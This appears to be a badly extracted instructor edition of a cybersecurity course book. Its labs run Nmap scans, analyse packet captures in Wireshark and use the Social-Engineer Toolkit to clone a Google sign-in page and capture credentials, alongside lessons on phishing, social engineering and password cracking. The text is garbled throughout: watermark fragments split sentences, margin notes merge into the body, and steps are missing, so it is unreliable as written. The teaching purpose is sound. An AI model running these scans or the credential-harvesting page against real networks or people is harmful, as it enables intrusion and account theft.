You'll be using Kali Linux™, an operating system designed to support experts in many different
areas of security. Kali Linux comes pre-packaged with hundreds of open source tools, including
ut
Nmap, a network scanner.
You will run Kali Linux as a virtual machine (VM) using Oracle's VirtualBox software, with your
ib
Windows® 10 computer as the host. VirtualBox and the Kali Linux VM have already been installed
and configured. You will also be targeting your other computer, a Windows Server® 2019 domain
controller.
tr
Activity: Performing
Reconnaissance on a Scenario
is
Network
You want to see how attackers can execute a reconnaissance attack. You'll scan your network and
Be sure to provide
hosts to see the kind of useful intelligence an attacker can glean. Understanding the nature of these
D
students with the IP
addresses to their
reconnaissance threats will enable you and your team to eliminate weaknesses in your network that
Windows 10 client, Kali reveal too much information.
Linux VM, and Windows
Server 2019 machine.
1. Start Kali Linux and Nmap. or
a) From the desktop, double-click the Oracle VM VirtualBox shortcut.
e
at
lic
up
Note: If a message box pops up telling you a new version of VirtualBox has
been released, select OK.
D
b) In the Oracle VM VirtualBox Manager window, with the CFR-Kali VM profile selected, select Start.
ot
N
o
D
e) From the Kali Linux desktop, select the Terminal Emulator icon on the top-left panel.
e
f) At the terminal command prompt, enter nmap
ut
Caution: Commands in Unix-like systems are case sensitive. Be mindful of
how you type.
ib
g) Examine the options for Nmap. Scroll up and, under HOST DISCOVERY, find the options to conduct
a ping scan to discover hosts.
tr
is
D
or
e
at
lic
up
D
ot
N
3.
A: nmap -sT
e
b) Skim the description of Nmap and verify its command-line syntax under the SYNOPSIS section.
ut
ib
tr
is
D
or
e
at
lic
up
D
7. Using what you've learned about Nmap, run a ping scan against your local
ot
network.
a) At the command prompt, enter sudo nmap –sn 10.39.5.0/24
N
Note: In order to detect the Windows Server machine, Nmap must be run with
superuser (root) privileges. This is what the sudo command does.
o
If your network setup is b) When prompted to enter the password, enter kali
D
different, provide
students with the IP Note: By default, when running a command with sudo, the system will prompt
range of the classroom you for a password every five minutes. You can enter the kali password any
computers. time you're prompted throughout the course.
e
ut
ib
tr
The command that
8. Run operating system discovery scans using Nmap. students should run for
is
step 8a is sudo nmap
a) Run an operating system discovery scan against your server in verbose mode.
–O -v 10.39.5.#,
where # is the last
D
number in their server's
IP address. Adjust the IP
address, if necessary.
Note: Remember to prefix this command and the following commands with
sudo so they execute with root privileges.
The command that
b) Now run the same scan against your router.
students should run for
Note: You can press the Up Arrow on your keyboard to display the command step 8b is sudo nmap
–O -v 10.39.5.1.
you last entered.
Adjust the IP address, if
necessary.
9. You could have run the operating system discovery scan against all the
devices in your network at the same time.
Why would you generally not wish to do that in a production environment?
A: It generates a lot of traffic and could impact network performance.
10.Run a TCP Connect() scan against your server and router using Nmap.
Note: You can scan multiple addresses at once by separating each IP address
e
with a space.
ut
The command that
students should run for 11.Which host showed more port numbers active, and why?
step 10 is sudo nmap
ib
–sT 10.39.5.1 A: The server has more port numbers open because it is a general purpose system rather than a
10.39.5.#, where # is focused one like a router.
tr
the last number in their
server's IP address. 12.What are some of the open ports on your server? Are any of them out of the
Adjust the IP address, if ordinary?
is
necessary.
A: Answers will vary, but you'll see several ports you should expect to be open, like 53 (DNS) and
389 (LDAP). However, an open port like 22 (SSH) may potentially be used as an attack surface.
D
13.Close the open terminal and minimize the Kali Linux VM window.
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 3-3
Examining Reconnaissance Incidents
Data Files
e
C:\CNX0013Data\Analyzing Reconnaissance Threats to Computing and Network Environments
\Wireshark-win64-2.0.1.exe
ut
C:\CNX0013Data\Analyzing Reconnaissance Threats to Computing and Network Environments
\Reconnaissance.pcapng
ib
Activity: Examining
Before You Begin Reconnaissance
tr
Incidents
You'll be using Wireshark on your Windows 10 client to analyze previously captured packets.
Wireshark is a sniffer or protocol analyzer that allows for real-time or saved captures of traffic on a
is
network interface.
Protocol analyzers are
D
Scenario discussed in more detail
later in the course.
One of your new security analysts at Develetech saw a suspicious warning from your IDS that
Before teaching this
attacks were targeting your network, so the analyst started the protocol analyzer Wireshark, and
Note: If you are prompted to update Wireshark, select Skip this version.
D
b) In The Wireshark Network Analyzer window, select File→Open and navigate to the
ot
c) If necessary, drag the middle pane down to see a display similar to the one shown here.
e
ut
ib
tr
is
D
d) Observe the three Wireshark panes.
• The top pane contains a list of every packet captured in that session and some summary
information about each one. The packet selected is the one you are looking at in the bottom two
or
sections. (In this case, packet 1 is selected.)
• The bottom pane displays a hexadecimal readout of the contents of the selected packet with 16
bytes in each line. If you know your Internet headers very well, you can discover the contents of
the traffic from this area alone.
e
• Fortunately, the middle pane provides a field-by-field interpretation of everything that the bottom
pane displays.
at
Note: The port numbers and flags are also displayed in the Info column in the top
pane. (The flags are indicated in brackets.)
e
session.
ut
6. Analyze the capture file to find the attack(s).
a) From the menu, select Statistics→Conversations.
ib
b) If necessary, select the TCP tab.
tr
is
D
or
e
at
lic
up
d) Scroll through the list of conversations. Note that there are many one-packet and two-packet
sessions, and a few three-packet sessions.
e) Sort by Port B and note the various destination port numbers.
ot
If there were data in the session, you would see it, but there isn't any in this case.
D
e
ut
b) Select packet 42.
ib
10.Follow the stream and close the pop-up window.
tr
What did the attacker do in this case?
A: The attacker tried to connect using the Telnet protocol (port 23) but was refused by the server.
is
11.Clear the stream and examine the entire packet capture.
D
What was the attacker trying to discover from your system in this attack?
A: Which port numbers were open and which were not. In other words, a port scan.
12.How or
could the attacker proceed after learning this information?
A: The attacker could see what services are running on open ports and try to attack those services.
e
13.Leave Wireshark open.
at
lic
up
D
ot
N
o
D
ACTIVITY 3-4
Capturing and Analyzing Data with Wireshark
e
Wireshark is still open in Windows 10.
ut
Activity: Capturing and
Scenario Analyzing Data with
Wireshark
Other than reviewing previously captured data, you need to learn how to capture and analyze traffic
ib
Make sure to give
yourself, in case you're the next security team member to see suspicious traffic.
students their classroom
IP addresses if you
tr
haven't already.
1. Generate network traffic to be captured in Wireshark. This activity is intended
is
a) From the menu, select Capture→Options. to teach students how to
b) Select the Ethernet interface and then select the Start button. capture and analyze live
data in Wireshark. This
D
is an important skill that
they can apply in many
places throughout the
or course.
e
at
lic
up
D
c) With the Wireshark capture running, right-click the Windows Start button and select Windows
PowerShell (Admin).
ot
d) If necessary, select Yes in the User Account Control message box. From here on, the
e) At the command prompt, enter ping 10.39.5.1 course activity steps
f) Enter tracert Microsoft.com assume that the student
N
h) Switch to your Wireshark capture and select the red Stop capturing packets button or select
Capture→Stop.
e
ut
Note: You can use the Capture→Options command to specify capturing a
certain amount of data or for a certain time.
ib
2. Use the Wireshark Filter bar to view and analyze only the Internet Control
Message Protocol (ICMP) data.
tr
a) At the top of the Wireshark screen, select the Filter bar.
is
D
or
b) Type icmp and press Enter to create a filter in Wireshark that shows only ICMP data.
Notice that your ping and traceroute traffic shows up here. Remember that you can select any
packet and look at the bottom two panes to see its details.
e
Note: When you create a new filter, Wireshark highlights the Filter bar with red
at
if your filter is incomplete or non-functional. The bar turns green when you
have a filter that works; however, it still may not be the filter you meant to use.
A yellow bar indicates that you're using a deprecated filter.
lic
generated by their use of Are the ones in your capture actually an indication of a problem in this case?
traceroute.
A: Not necessarily. Many are time-exceeded errors that are traceroute's way of determining the
routers along the path you specified (in this case, the path to Microsoft's website).
D
Consider informing a) Select the Filter bar, type http and then press Enter.
students that there is a This displays the web traffic in the capture, including your access to the Microsoft.com website.
difference between
filtering between port 80,
which displays the entire
conversation (including
TCP transmissions), and
HTTP, which does not.
b) In the upper pane, right-click one of the HTTP packets and select Follow→TCP Stream.
e
ut
ib
tr
is
D
or
This opens a new window showing the raw data from that session. Red text indicates the client side
e
of the connection while blue represents the server side.
at
6. Create an ip.addr filter to examine the traffic between client and server.
a) Select Clear to clear the Filter bar.
up
D
ot
N
o
D
Caution: Do not press Enter yet. Also, make sure you are including the period
at the end.
It's important that Notice that the Filter bar is red and that a drop-down list appears with suggestions for additional
students do not press parts of the filter. You're looking for addr.
Enter until they've
finished building the filter
in the following steps.
e
ut
ib
tr
is
D
or
e
at
Note: In Wireshark, == represents equal to, > represents greater than, and <
represents less than. You can also identify entire networks by using Classless
up
Note: You can use ip.src to just look at sources or ip.dst for just destinations.
e
ut
ib
tr
is
D
or
e
at
g) Select OK.
The filter shows up in the Filter bar but hasn't actually been applied yet.
h) Press Enter to apply the filter.
up
This capture displays the HTTP GET requests. This is a useful filter to see what pages people are
accessing.
D
ot
N
8. Combine the HTTP GET filter and an ICMP request filter to view data that
matches either filter.
o
a) In the Filter bar, modify the existing filter to read http.request.method == "GET" || icmp Remind students about
D
e
ut
ib
tr
9. Craft a filter to find packets that contain the Transmission Control Protocol
is
(TCP) SYN flag.
D
After testing it, what filter worked for you?
A: The easiest way to filter for TCP SYN traffic would be by using tcp.flags.syn==1. You can also
achieve the same result if you use tcp.flags==0x02 || tcp.flags==0x12 as the filter expression.
10.View or
ICMP warnings logged during the capture.
a) Select Analyze→Expert Information.
e
b) In the Expert Information dialog box, select the Warn drop-down arrow for ICMP to expand its
messages.
at
lic
up
D
ot
N
A: This was part of traceroute. Once it got to a firewall, the remaining echo requests were filtered so
they had no answering packet.
D
e
15.Close
Wireshark without saving. Also close any open browser windows and
ut
PowerShell windows.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
TOPIC C
Assess the Impact of Social Engineering
A large part of an attacker's reconnaissance efforts will be to deceive and manipulate their targets.
After all, finding a vector for a technical attack can be a difficult prospect. Instead of going through
that trouble, the attacker can simply exploit the weakest link in any organization: the people.
e
ut
Social Engineering
Social Engineering Social engineering is the practice of deceiving people into giving away access or confidential
ib
information to unauthorized parties. The social engineer typically performs some sort of confidence
trick on a privileged target. The target, ignorant of this trick, uses their privileges to grant the
attacker access or information. This may be the attacker's ultimate goal, but social engineering is
tr
often used as a springboard to a larger, more devastating attack. This is especially true when social
engineering is used in reconnaissance—the attacker deceives employees into revealing information
is
about the company's personnel, its policies, and its operations, which the attacker can use to their
advantage when they plan their attack.
D
When an attacker engages in social engineering, they can even avoid standard cybersecurity defenses
entirely, focusing their attack on undermining human weaknesses rather than crafting highly
technical exploits.
or
Social engineering is one of the most common and successful malicious techniques in information
security. Because it exploits basic human trust, social engineering has proven to be a particularly
effective way of manipulating people into misplacing this trust. A social engineer may pose as an
e
authority figure, like a manager or IT administrator, or someone the user is familiar with, like a
friend or family member. If the façade is believable enough, the victim will likely let their guard
at
down. In many cases, this is enough for the attacker to capitalize on, potentially leading to serious
consequences for the organization.
lic
up
D
ot
N
Types of Social
Engineering
o
Consider asking
students if they can
D
provide real-world
examples of these types
of attacks. Do they have Figure 3-8: A social engineering attack.
experience in being
targeted for a social
engineering attempt? Do Types of Social Engineering
they know anyone who
has been a victim of Social engineering can take several different forms. One type of attack may be more effective against
such an attack? particular targets or it may simply get the attacker more of what they're looking for. Some attack
types are simply easier than others to pull off. No matter the reason, each one of the following social
engineering attack types can be troublesome for the organization if taken for granted.
e
need the employee's user name and password to make sure it gets entered
ut
into the new system.
Impersonation is often successful in situations where an identity cannot
be easily established. If the employee in the previous example doesn't
ib
know the real help desk worker or the help desk number, they may be less
inclined to question the request. Additionally, impersonation may be fairly
tr
successful in face-to-face interactions. Due to various social factors, most
people want to avoid appearing rude or dismissive when they're talking
is
with another human being directly. So, they may not question the
impostor like they would if it were email correspondence. This requires
that the victim doesn't actually know what the individual being
D
impersonated looks like or doesn't know them well enough to doubt their
appearance.
Hoax
or
This is an email-based or web-based attack that is intended to trick the
user into performing undesired actions, such as deleting important system
files in an attempt to remove a virus. It could also be a scam to convince
users to give up important information or money for an interesting offer.
e
Like many social engineering techniques, hoaxes depend greatly on the
at
Quid pro quo Quid pro quo is Latin and can be translated as "something for something"
or "this for that." Essentially, one party does a favor for another party,
but expects a favor in return. In the realm of social engineering, quid pro
quo threats often take the form of the attacker asking a victim for access
D
the employee provides on the form may go into too much detail and give
the attacker some reconnaissance material. At the end of the form, the
attacker claims they will send the employee a prize for being so helpful.
N
e
verification" is necessary for security reasons. Legitimate financial
institutions never solicit this information from their clients.
ut
When the medium used is SMS text messages rather than email, this is
called SMiShing.
ib
Phishing is one of the most prominent forms of social engineering, and
even experienced computer users may be fooled by what appears to be an
authority figure.
tr
Spear phishing and When a phishing attack targets a specific individual or institution, it is
is
whaling called spear phishing. Whaling is a form of spear phishing that targets
individuals or organizations known to possess a good deal of wealth.
D
Whaling targets individuals who work in Fortune 500 companies or
financial institutions whose salaries are expected to be high.
Whaling is a riskier method for social engineers, as security is bound to be
or
more robust than it is with average users or small companies, and the
consequences of being caught will likely be much more severe. However,
exploiting the weakest link can result in a huge payoff for the attacker(s).
e
Vishing This is a human-based attack where the goal is to extract personal,
financial, or confidential information from the victim by using services
at
Baiting Baiting exploits the human tendency toward curiosity by planting physical
media in an area where someone will find it and then promptly use it. For
example, a social engineer might install malware on a removable Universal
o
Serial Bus (USB) drive, then place that drive on the ground in a parking
lot outside a corporate office. An employee who arrives for work may
D
notice that drive, pick it up, then promptly insert it into their workstation.
If their workstation has autorun enabled for removable media, the
malware will immediately infect the host and may spread to other hosts in
the corporate network.
A similar virtual attack occurs when a user is enticed to download free
software, which an attacker has packaged with a Trojan horse.
e
mimic the real website or contain malicious software that will infect the
victim's computer.
ut
Spam and spim Spam is an email-based threat where the user's inbox is flooded with
emails that advertise products or promotions for get-rich-quick schemes
ib
and can sometimes deliver malware. Spam can also be used within social
networking sites such as Facebook and Twitter. Spim is an attack similar
to spam that is propagated through instant messaging (IM) instead of
tr
through email.
With the prevalence of spam filters in email clients and spim blockers in
is
instant messaging services, these techniques are less effective than they
used to be. However, the sheer volume of unsolicited messages sent in
D
bulk every day still makes spam and spim viable methods for deceiving
inexperienced users.
Shoulder surfing
or
This is an attack where the goal is to look over the shoulder of an
individual as they enter password information or a PIN. This is very easy
to do today with smartphones. The attacker doesn't even need to be
present—they can set their phone down near the victim's desk, press
e
record, and walk away. Attackers can also shoulder surf at a distance
using surveillance cameras or binoculars. Shoulder surfing is a common
at
tactic among insider threats as they already have physical access to their
colleagues' workspaces.
lic
Dumpster diving This is an attack where the goal is to reclaim important information by
inspecting the contents of trash containers. This is especially effective in
the first few weeks of the year as users discard old calendars with
up
Tailgating This is a human-based attack where the attacker will slip in through a
secure area following a legitimate employee. The employee does not
N
know the attacker is even behind them. To prevent this type of attack,
organizations often install access control mechanisms at each entrance.
Users should also be educated to be more observant of their
o
e
terminated from the company. So, they let the attacker in thinking that it's
just another day.
ut
More likely, however, is the employee doesn't know the attacker
personally. Many people would prefer to avoid confrontation even if they
ib
suspect the piggybacker isn't authorized to enter. Some people may not
even consider that the piggybacker doesn't belong, and will open the way
for them just to be polite.
tr
is
Phishing and Delivery Media
Phishing and Delivery Because phishing is perhaps the most popular and effective social engineering type, it's a good idea
D
Media to take a closer look at these attacks.
As you've seen, different variations on phishing, like vishing and SMiShing, imply the use of more
• Email is the standard medium used to entice targets into revealing information. The advantage
of using email is its asynchronous nature: neither the attacker nor the target expects any real-time
e
communication, so the attacker doesn't need to submit to on-the-spot questioning from
at
someone who is skeptical. The attacker can more easily filter out savvy users this way and focus
instead on snaring the inexperienced or gullible. However, the disadvantage of email is that
phishing attempts are often caught by modern spam filters, so the user may never even see the
lic
attempt.
• Electronic postcards, or e-cards, are typically media like video or animations embedded into
email messages. Visually appealing messages can be more successful at enticing users to click
up
them. This is especially true if the attacker puts thought into who they're targeting and what kind
of greeting might be appropriate. For example, if the attacker discovers their target's date of
birth, they can increase their chances of infiltration by crafting a malicious birthday e-card and
sending it to the target on their birthday. The disadvantage of using e-cards is that many email
D
effective because people tend to be more cautious when someone they don't know is messaging
them. However, the quick and expedient nature of instant messaging may actually have the
opposite effect: people may take less time to think about the message they're reading, who sent
N
it, and what the hyperlink will do when they select it. Another potential issue with IM-based
phishing is that spam filters in IM software are not as robust as with email.
• Text messaging has many of the same issues as instant messaging. Most modern phones have
o
SMS capabilities, and most mobile phone users engage in texting. So, if they see a text message
from a number instead of a person from their contacts list, the user may be more likely to
D
disregard the message. However, attackers can reach a much wider audience with SMS than with
instant messaging because neither the attacker nor their targets need to be running specific IM
software.
• Social networking sites have messaging components that approximate IMing and email, so
many of those same issues apply. The attacker may overcome the hurdle of trust if the target
adds people they don't really know to their friends list. Another avenue of attack sees the attacker
impersonating a friend of the target; the attacker gathers personal information beforehand, like
the friend's portrait, age, occupation, and interests, and stages a fake profile. They can then use
this profile to convince the target they know each other, making it easier for the attacker to trick
the target into revealing personal information.
• Quick Response (QR) codes can be sent through a variety of different messaging protocols.
They can be used as a delivery medium for phishing because QR codes often carry URL data. If
the URL the QR code links to is malicious, this can place the user's device at risk of infection
when they scan the code. QR code phishing by itself is not very convincing, and the user
probably won't go to the trouble of scanning an unsolicited code. However, in the proper
context, it can be effective. This is especially true when the QR code is made to look like a
e
coupon, or if accompanying text tells the user that scanning the code will help them save money
on a product they're interested in.
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
Figure 3-9: A phishing attempt using an e-card. The attacker has already gathered intelligence
on the recipient's name, birthday, and interests.
o
Just like the ways they're delivered, phishing attacks have a variety of different ways they can trick Phishing and Common
their targets. All these components can even be used in conjunction with one another to maximize Components
the effect.
• Spoofing messages are used to circumvent a major problem when phishing with various
delivery media. Even non-tech-savvy people will balk at messages they receive from unknown
sources. They might know someone named "John," but the "From:" field in the email header
says e34578dfh@mal-media.example—a pretty big red flag. However, email headers are easily
spoofed, and there are tools that automate the process. An attacker can easily use these so that,
when their victim loads their email software, they see the "From:" field as
john.henderson@develetech.com—the actual address of colleague John Henderson. Even
experienced users are often tricked by this because many inaccurately believe that the "From:"
field cannot be spoofed.
• Rogue domains are used in DNS hijacking attacks. Certain malware can alter the client's DNS
configuration and point their resolution services to a DNS server controlled by the attacker. So,
any URL the user enters into their browser could be redirected to a malicious site, even one
e
spoofed to look like the legitimate site. The phishing message can simply present a link to the
legitimate site—like www.google.com—and the user will be none the wiser. Attackers typically
ut
use rogue domains to trick people into typing their credentials into what they believe is the true
website.
ib
• Malicious links can be as simple as directly linking to a website controlled by the attacker, but
this isn't always effective. Much like a non-spoofed email, the user can see a URL named http://
le3.fy7.net/lx8h.aspx and immediately be skeptical. But it's simple to embed that URL into a
tr
much different display URL that's more enticing to the user. Because many users fail to verify the
actual link by hovering their mouse over the display URL, an attacker can have much more
is
success for almost no extra effort.
• Malicious attachments are perhaps less effective than they used to be. Most email clients
D
include some form of anti-malware scanning when users attempt to download an attachment.
Users are also more wary of downloading something from email than they are clicking a link
within the message body. Nevertheless, an attacker can have success if they make the file seem as
or
legitimate as possible to the user. This is often done in conjunction with spoofing—the message
appears to come from john.henderson@develetech.com, and the attachment is named Q2
sales.xlsx. If the file is able to avoid detection by the anti-malware, then this could be a strong
vector for a Trojan horse or other malicious software.
e
The spoofing website
at
Figure 3-10: Using a web-based tool to create a spoofed email (left) and receiving that spoofed
email (right).
D
• A social engineer pretending to be an employee calls a human resources department. The social
engineer then politely asks the human resources personnel to provide them with names,
numbers, and emails of all employees in a particular department under the pretense of sending
them gifts. Instead, the social engineer has gathered key personnel information.
• A social engineer meets an employer in person for a job interview. As expected, the social
engineer asks the interviewer questions about the organization. The interviewer may think these
are innocent questions, but in reality, the social engineer is probing for any bit of information
about the organization they are able to get the interviewer to divulge. This can include
information about the company's network infrastructure, the storage protocols they use, the
e
environments that run on workstations and other hosts, and so on.
• A social engineer crafts a profile on social networking sites. Through this profile, the social
ut
engineer makes friend requests of the private social networking profiles of a company's
employees. The employees, thinking this profile belongs to a colleague or acquaintance, accept
ib
the request. On the employees' profiles are bits of information that people often use as part of
their passwords or as password verification questions. The social engineer is able to gather
intelligence on a large group of the company's personnel to use in an attack.
tr
• A social engineer tailgates into an entrance and then uses this opportunity to observe the
organization's physical security. How many guards are there? What areas do surveillance cameras
is
cover and where do they not? What other physical security controls are in place? The answers to
these questions can provide the attacker with valuable information about their target.
D
• A social engineer baits an employee by leaving a USB drive on the ground in the company
parking lot. The employee, curious about what's on the drive, picks it up and plugs it into their
workstation. Rather than executing any sort of overt malware, the social engineer has configured
or
this drive to automatically run port scanning and network enumeration software. The social
engineer now has a wealth of information about the company's network they can use to launch a
successful attack.
e
at
lic
up
D
ot
N
o
D
ACTIVITY 3-5
Assessing the Impact of Social Engineering
e
Kali Linux is running. You'll be using the Social-Engineer Toolkit, a Python-based exploit
framework that can create a wide variety of automated social engineering attacks.
ut
Activity: Assessing the
Impact of Social Scenario
ib
Engineering
Several employees recently had some of their personal credentials stolen. These credentials were to
major sites like Google, Facebook, and LinkedIn. All of the victims claim that, in accordance with
tr
company security policy, they never directly gave their user names and passwords to anyone asking
for them. You therefore suspect they were tricked in a more subtle way—that the websites they
thought they were logging in to were in fact convincing forgeries.
is
In order to assess how effective pharming attacks are on your personnel, you'll see just how easy it is
to spoof the sign-in page of a major public website. For now, it was just the employees' personal
D
accounts that were compromised—but you don't want this to happen when they log in to an
internal website with their work credentials.
running a sudo
command. a) Enter 1 to select Social-Engineering Attacks.
b) Enter 2 to select Website Attack Vectors.
up
Note: In this activity, you will use a fake Google sign-in page as the template.
You can also create your own fake site, or import one.
ot
3. Start the server that will host the fake web page.
a) At the prompt, enter 10.39.5.#, where # is your Kali Linux VM's IP address.
N
b) Open a web browser and navigate to 10.39.5.#, where # is your Kali Linux VM's IP address.
Consider pointing out In a real-world scenario, the attacker would use an embedded link, a shortened address, or a
that the spoofed site isn't compromised domain name to make the site more convincing to the victim.
perfect; for example, it
might be using an older
style of login page that
Google has since
changed.
c) Enter a fake user name and password combination into the sign-in fields, and then select the Sign in
button.
e
ut
ib
tr
is
D
or
e
at
lic
b) Verify that the terminal captured the user name and password you typed into the fake Google sign-in
page.
e
ut
ib
tr
is
D
or
e
at
What could make this attack more difficult for the attacker?
lic
6.
A: Answers may vary. Encouraging employees to use Google's two-factor authentication would help
mitigate this type of pharming attack. Also, implementing user policies that discourage clicking
unsolicited links could also help prevent the attack from succeeding.
up
believable, especially if they're spoofing a major website like Google. Likewise, they may choose
to spoof a less well-known site to catch the users off guard. This is especially effective if they've
convinced the users they need to enter their credentials for official reasons.
ot
8. What is the most significant weak spot that enables attacks like these to
succeed, and what can be done to fix the problem?
N
A: Answers may vary, but almost always, it's the human factor that is the weakest point in social
engineering attacks. Preventing these types of attacks from succeeding requires security
o
Summary
In this lesson, you analyzed the threat of attackers gathering intelligence on your network, systems,
and people. This intelligence can empower an attacker to launch a more devastating attack on your
organization. On the other hand, knowing what information you're exposing to attackers can
empower you to address glaring holes in your security.
Encourage students to
What reconnaissance method is of most concern to you and your organization?
e
use the social
A: Answers will vary. Students in public-facing companies may be most wary of footprinting, as a good networking tools
ut
deal of operational information can be easily accessible via the Internet. Others may be concerned provided on the CHOICE
about attackers scanning their network for open ports to use as a vector for attack. Some students Course screen to follow
up with their peers after
may be wary of having their entire network mapped with an enumerator, which could make it easier
ib
the course is completed
for an attacker to flood key devices that keep the network running optimally.
for further discussion
and resources to support
What sort of social engineering tactics have you or others you know
tr
continued learning.
experienced? How well are friends, family, and colleagues able to spot attempts
to manipulate them for information?
is
A: Answers will vary. Students are likely familiar with phishing, spam, and other communication-based
social engineering attacks. They may not have considered more physical social engineering, like
D
tailgating and dumpster diving. Students may know someone who was the victim of a social
engineering attack, indicating that some attacks are very convincing, the victims are undereducated
on the subject of cybersecurity, or both.
or
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
e
resources for a more continuous learning experience.
at
lic
up
D
ot
N
o
D
e
ut
Environments
ib
Lesson Time: 5 hours
tr
is
D
Lesson Introduction
or
You've analyzed the general risks and threats to your systems, and you've identified how
attackers can gather intelligence on these systems. Now you can begin to analyze the major
attacks themselves. There's a wide variety of ways malicious users can compromise your
e
operations, and it's vital you understand the potential effects of each one on the
organization.
at
Lesson Objectives
lic
TOPIC A
Assess the Impact of System Hacking Attacks
In this topic, you'll consider how attackers can break into a system by finding or creating an
opening, and exploiting it.
e
System Hacking
ut
System Hacking (6 There are numerous tasks an attacker might perform when deciding to target a host such as a server
Slides) or workstation. In general, the approach will involve a combination of planning, knowledge, skills,
ib
Throughout this lesson, tools, and luck. While having an arsenal of good tools and methodologies will help the hacker, there
consider pointing to is not a single path to success. Every target is different, and the caretakers of a particular target may
specific Common have gone to great lengths to secure it from attack. So persistence, attention to detail, and an ability
tr
Vulnerabilities and to quickly identify and take advantage of opportunities are critical to the attacker's success.
Exposures (CVE), Unfortunately, an attacker needs only one open door (literally or figuratively) to gain access, and
is
Common Weakness
comprehensive security requires locking down thousands of potential access points.
Enumeration (CWE™),
and Common Attack
D
Pattern Enumeration
and Classification
(CAPEC™) entries that
demonstrate the real-
world impact of these
attacks and their related
vulnerabilities. Some
Figure 4-1: The system hacking process.
or
1. Start with a goal: The attacker might start with a specific goal in mind, such as defacing content
e
examples are provided on a particular web server or obtaining sensitive information that can be sold or held for ransom.
for you in content Or the attacker might have a very fuzzy goal—exploring to find vulnerabilities and deciding what
at
delivery tips. (if anything) to do about them once they are found.
2. Plan the attack: The attacker begins by formulating a plan of attack. Through personal
experience and information shared by others, an attacker would know common patterns for
lic
performing such an attack, and would likely possess various scripts and applications to automate
some of the busy work. In the case of an attack upon a web server, the attacker would consider
the attack surface, the various fronts on which such an attack could be launched:
up
• The operating system the server runs on, such as Windows® or Linux®.
• The server application itself (such as Apache or Internet Information Services [IIS]) provides
another front.
D
• Supporting systems and applications, such as databases, can be attacked (through SQL
injection, for example).
• Other servers co-located on the same host or local network.
ot
• Other applications on the host, such as Secure Shell (SSH) or Windows Remote Desktop, can
also provide a vector for attack.
N
3. Perform reconnaissance: Because the attacker doesn't know which front will be unprotected,
each one must be discovered and tested. Various sorts of reconnaissance might be useful in an
attack upon a web server, including:
o
e
collection points.
• Use the server as a launching point for attacks on other hosts.
ut
• Deface data on the site.
6. Conduct post-attack activities: To ensure they aren't detected or identified during or after an
ib
exploit, an attacker will attempt to eliminate all traces of their hack. This can help the attacker
evade any forensic processes the organization implements in the wake of a breach. Even if
attackers can't completely hide their attack, they may still be able to at least remove all evidence
tr
that points back to them as the culprit. Attackers will also attempt to persist in a target
environment as part of the post-attack phase; this will enable them to reuse access and continue
is
exploitation over a long period of time.
D
Password Sniffing
Password sniffing is an attack where the attacker monitors network transmissions for password Password Sniffing
or
data to extract that data for later use. Network users often transmit credential information both
within the private network and outside its boundaries, such as through the Internet. For example, a
network administrator's daily routine may involve opening a remote shell into various servers in the
organization to configure and maintain them. Every time the administrator attempts access to the
e
shell, they will likely need to transmit credentials to an authentication server. That transmission is
at
such as Secure Sockets Layer/Transport Layer Security (SSL/TLS). If the attacker captures the
traffic, they can easily look for a user name and password within the packet. Transmissions that are
specifically encrypted, however, may halt a password sniffer's attempts unless the attacker is in
up
possession of the decryption key. In the previous example, the administrator is most likely using a
protocol such as Secure Shell (SSH) to establish an encrypted tunnel.
Organizational networks, especially larger ones, are usually segmented. This can prevent a sniffer
D
from ever seeing traffic that flows outside the segment where it is located. So, even if a transmission
is in plaintext or the attacker can decrypt it, they may not see that transmission in the first place.
Attackers can increase their chances of capturing passwords by placing the sniffer at key points in
ot
the network. For example, a sniffer installed on a proxy device may be able to see all traffic that is
externally bound and must first pass through the proxy.
N
o
D
e
ut
ib
Figure 4-2: Sniffing a password in Wireshark.
tr
Active vs. Passive Sniffing
Sniffing can be divided into two general types: active and passive. In active sniffing, the attacker
is
transmits packets directly to a target in the hopes of receiving a response that reveals password data.
In passive sniffing, the attacker positions the sniffer between nodes on a network and captures
D
packets sent and received by those nodes.
Password Cracking
Password Cracking
Example CVE IDs:
CVE-2009-4269 and
or
Password cracking is the recovery of secret passwords from data stored or transmitted by a
computer. Password crackers typically crack passwords in one of the following four methods:
e
• Brute-force password cracking uses random characters and numbers to crack a password. Brute-
CVE-2012-2742.
force password cracking is extremely resource intensive and can take a long time to be
at
Consider demonstrating successful, as password crackers generate every possible permutation for a given set of characters
the RainbowCrack
and numbers defined by a minimum and maximum length. This process can take anywhere from
website at project-
lic
rainbowcrack.com. seconds to thousands of years depending on the strength and complexity of the password being
Online vs. offline
cracked. It is therefore most effective on shorter passwords.
password cracking is • Dictionary password cracking uses a targeted technique of successively trying all the words in a
discussed later with pre-written, exhaustive list. This type of password cracking is typically faster than brute-force
up
penetration testing, but attacks, as it only tries possible passwords that are likely to be found or used. The main reason
you may wish to dictionary password cracking tends to be successful is because many people choose passwords
introduce the concepts that are short, single words found in standard dictionaries. These passwords can also be easily
here.
D
predicted variations, such as appending a digit or special character to a simple word. Note that
not all entries in a password dictionary are necessarily literal dictionary words.
• Hybrid password cracking uses a combination of both brute-force and dictionary password-
ot
cracking techniques. A hybrid password-cracking application will modify a word list or dictionary
by making common substitutions to letters, such as replacing the letter "a" with the "@" sign.
These tools also typically append characters and numbers to the end of dictionary words; for
N
example, the password "password" may be guessed as: p@ssword, p@ssw0rd, password1,
password01, pa$$word, and so on. This technique tends to be faster than standard brute-force
attacks, but slower than standard dictionary attacks.
o
• Rainbow tables are sets of pre-computed passwords and their hashes stored in a file. Using
D
rainbow tables dramatically reduces the time needed to crack a password. However, rainbow
tables work only on older hashing protocols with shorter outputs, such as Message Digest 5
(MD5) and Secure Hash Algorithm 1 (SHA-1). Newer protocols with 256 to 512+ bit outputs
have too many possibilities to fit into a single rainbow table. Adding a cryptographic salt to the
hashing process also mitigates the efficacy of rainbow tables, as the same password may have
two different hashes.
Consider informing
students that online
versus offline password
attacks will be discussed
in a later lesson.
e
ut
ib
tr
Figure 4-3: The results of a password crack.
is
Masked Attack
D
A masked attack is a type of brute-force cracking that goes about the process in a smarter way.
Because people often act predictably, especially when it comes to creating passwords, attackers can
shape their cracking attempt around these predictions. A password like Martin1945 exhibits several
or
traits common to passwords, including the starting character being uppercase, and the last four
characters being a year (typically the person's year of birth). Using these conventions, the attacker
